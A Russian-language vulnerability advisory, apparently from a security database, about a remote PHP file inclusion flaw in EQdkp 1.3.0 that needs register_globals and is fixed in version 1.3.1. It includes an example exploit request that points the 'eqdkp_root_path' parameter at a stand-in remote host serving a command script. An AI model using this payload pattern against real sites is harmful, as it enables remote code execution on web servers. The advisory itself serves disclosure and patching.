PHP-инклюдинг в EQdkp

Дата публикации:
15.05.2006
Дата изменения:
15.05.2008
Всего просмотров:
1363
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
EQdkp 1.x
Уязвимые версии: EQdkp 1.3.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "eqdkp_root_path" в сценарии "includes/dbal.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

/includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

URL производителя: eqdkp.com

Решение: Установите последнюю версию (1.3.1) с сайта производителя.

Ссылки: EQdkp <= 1.3.0 Remote File Inclusion

или введите имя

CAPTCHA